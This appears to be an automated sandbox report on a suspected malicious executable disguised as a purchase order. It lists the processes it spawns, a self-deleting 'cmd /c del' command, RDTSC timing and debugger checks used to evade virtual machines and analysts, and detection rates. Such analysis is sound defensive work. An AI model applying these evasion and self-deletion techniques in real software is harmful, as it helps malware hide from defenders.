          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Purchase Order 40,7045$.exeVirustotal: Detection: 43%
          Source: Purchase Order 40,7045$.exeReversingLabs: Detection: 36%
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeFile read: C:\Users\user\Desktop\Purchase Order 40,7045$.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'Jump to behavior
          Source: Purchase Order 40,7045$.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: Purchase Order 40,7045$.exe, 00000000.00000003.240059107.0000000003210000.00000004.00000001.sdmp, Purchase Order 40,7045$.exe, 00000001.00000002.274071356.000000000107F000.00000040.00000001.sdmp, ipconfig.exe, 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Purchase Order 40,7045$.exe, ipconfig.exe
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013D7FB0 LoadLibraryA,GetProcAddress,RpcMgmtEpEltInqBegin,VirtualProtect,EnumTimeFormatsA,__wsystem,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,0_2_013D7FB0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E0595 push ecx; ret 0_2_013E05A8
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013DD44F push ecx; ret 0_2_013DD462
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00415913 push edx; retf 1_2_00415915
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041AC62 push D8D19732h; iretd 1_2_0041AC69
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00414D57 push esi; retf 1_2_00414D58
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041AD65 push eax; ret 1_2_0041ADB8
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00414DEA push eax; ret 1_2_00414E32
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041ADB2 push eax; ret 1_2_0041ADB8
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041ADBB push eax; ret 1_2_0041AE22
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00414E7E push eax; ret 1_2_00414E32
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041AE1C push eax; ret 1_2_0041AE22
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00414E24 push eax; ret 1_2_00414E32
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0040FF92 push 00000033h; iretd 1_2_0040FF98
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FDD0D1 push ecx; ret 1_2_00FDD0E4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02ECD0D1 push ecx; ret 5_2_02ECD0E4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B15913 push edx; retf 5_2_02B15915
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B14E24 push eax; ret 5_2_02B14E32
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1AE1C push eax; ret 5_2_02B1AE22
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B14E7E push eax; ret 5_2_02B14E32
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B0FF92 push 00000033h; iretd 5_2_02B0FF98
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1AC62 push D8D19732h; iretd 5_2_02B1AC69
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1ADB2 push eax; ret 5_2_02B1ADB8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1ADBB push eax; ret 5_2_02B1AE22
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B14DEA push eax; ret 5_2_02B14E32
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1AD65 push eax; ret 5_2_02B1ADB8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B14D57 push esi; retf 5_2_02B14D58

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeRDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeRDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002B083D4 second address: 0000000002B083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002B0876E second address: 0000000002B08774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_004086A0 rdtsc 1_2_004086A0
          Source: C:\Windows\explorer.exe TID: 5636Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6160Thread sleep time: -48000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000002.00000000.251236949.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.259375031.0000000008C73000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000002.00000000.254456910.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.259579486.0000000008D97000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}October%%
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_004086A0 rdtsc 1_2_004086A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00409900 LdrLoadDll,1_2_00409900
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E032D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_013E032D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013D7FB0 LoadLibraryA,GetProcAddress,RpcMgmtEpEltInqBegin,VirtualProtect,EnumTimeFormatsA,__wsystem,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,0_2_013D7FB0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013FD014 mov eax, dword ptr fs:[00000030h]0_2_013FD014
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013FD051 mov eax, dword ptr fs:[00000030h]0_2_013FD051
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013FD0B4 mov eax, dword ptr fs:[00000030h]0_2_013FD0B4
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013FC520 mov eax, dword ptr fs:[00000030h]0_2_013FC520
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F858EC mov eax, dword ptr fs:[00000030h]1_2_00F858EC
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]1_2_00F840E1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]1_2_00F840E1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]1_2_00F840E1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBF0BF mov ecx, dword ptr fs:[00000030h]1_2_00FBF0BF
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h]1_2_00FBF0BF
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h]1_2_00FBF0BF
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC90AF mov eax, dword ptr fs:[00000030h]1_2_00FC90AF
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89080 mov eax, dword ptr fs:[00000030h]1_2_00F89080
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]1_2_010449A4
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]1_2_010449A4
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]1_2_010449A4
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]1_2_010449A4
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010069A6 mov eax, dword ptr fs:[00000030h]1_2_010069A6
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h]1_2_00FA0050
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h]1_2_00FA0050
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]1_2_010051BE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]1_2_010051BE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]1_2_010051BE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]1_2_010051BE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]1_2_00FAA830
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]1_2_00FAA830
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]1_2_00FAA830
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]1_2_00FAA830
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]1_2_00F9B02A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]1_2_00F9B02A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]1_2_00F9B02A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]1_2_00F9B02A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]1_2_00FB002D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]1_2_00FB002D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]1_2_00FB002D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]1_2_00FB002D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]1_2_00FB002D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010141E8 mov eax, dword ptr fs:[00000030h]1_2_010141E8
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01054015 mov eax, dword ptr fs:[00000030h]1_2_01054015
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01054015 mov eax, dword ptr fs:[00000030h]1_2_01054015
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]1_2_01007016
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]1_2_01007016
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]1_2_01007016
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]1_2_00F8B1E1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]1_2_00F8B1E1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]1_2_00F8B1E1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h]1_2_00FB61A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h]1_2_00FB61A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2990 mov eax, dword ptr fs:[00000030h]1_2_00FB2990
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01051074 mov eax, dword ptr fs:[00000030h]1_2_01051074
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01042073 mov eax, dword ptr fs:[00000030h]1_2_01042073
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAC182 mov eax, dword ptr fs:[00000030h]1_2_00FAC182
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA185 mov eax, dword ptr fs:[00000030h]1_2_00FBA185
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01003884 mov eax, dword ptr fs:[00000030h]1_2_01003884
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01003884 mov eax, dword ptr fs:[00000030h]1_2_01003884
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h]1_2_00F8B171
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h]1_2_00F8B171
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8C962 mov eax, dword ptr fs:[00000030h]1_2_00F8C962
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h]1_2_00FAB944
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h]1_2_00FAB944
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB513A mov eax, dword ptr fs:[00000030h]1_2_00FB513A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB513A mov eax, dword ptr fs:[00000030h]1_2_00FB513A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]1_2_0101B8D0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101B8D0 mov ecx, dword ptr fs:[00000030h]1_2_0101B8D0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]1_2_0101B8D0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]1_2_0101B8D0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]1_2_0101B8D0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]1_2_0101B8D0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]1_2_00FA4120
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]1_2_00FA4120
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]1_2_00FA4120
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]1_2_00FA4120
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA4120 mov ecx, dword ptr fs:[00000030h]1_2_00FA4120
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]1_2_00F89100
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]1_2_00F89100
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]1_2_00F89100
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104131B mov eax, dword ptr fs:[00000030h]1_2_0104131B
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2AE4 mov eax, dword ptr fs:[00000030h]1_2_00FB2AE4
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2ACB mov eax, dword ptr fs:[00000030h]1_2_00FB2ACB
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9AAB0 mov eax, dword ptr fs:[00000030h]1_2_00F9AAB0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9AAB0 mov eax, dword ptr fs:[00000030h]1_2_00F9AAB0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBFAB0 mov eax, dword ptr fs:[00000030h]1_2_00FBFAB0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01058B58 mov eax, dword ptr fs:[00000030h]1_2_01058B58
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]1_2_00F852A5
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]1_2_00F852A5
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]1_2_00F852A5
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]1_2_00F852A5
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]1_2_00F852A5
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBD294 mov eax, dword ptr fs:[00000030h]1_2_00FBD294
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBD294 mov eax, dword ptr fs:[00000030h]1_2_00FBD294
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0103D380 mov ecx, dword ptr fs:[00000030h]1_2_0103D380
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC927A mov eax, dword ptr fs:[00000030h]1_2_00FC927A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104138A mov eax, dword ptr fs:[00000030h]1_2_0104138A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01055BA5 mov eax, dword ptr fs:[00000030h]1_2_01055BA5
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]1_2_00F89240
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]1_2_00F89240
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]1_2_00F89240
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]1_2_00F89240
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010053CA mov eax, dword ptr fs:[00000030h]1_2_010053CA
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010053CA mov eax, dword ptr fs:[00000030h]1_2_010053CA
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC4A2C mov eax, dword ptr fs:[00000030h]1_2_00FC4A2C
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC4A2C mov eax, dword ptr fs:[00000030h]1_2_00FC4A2C
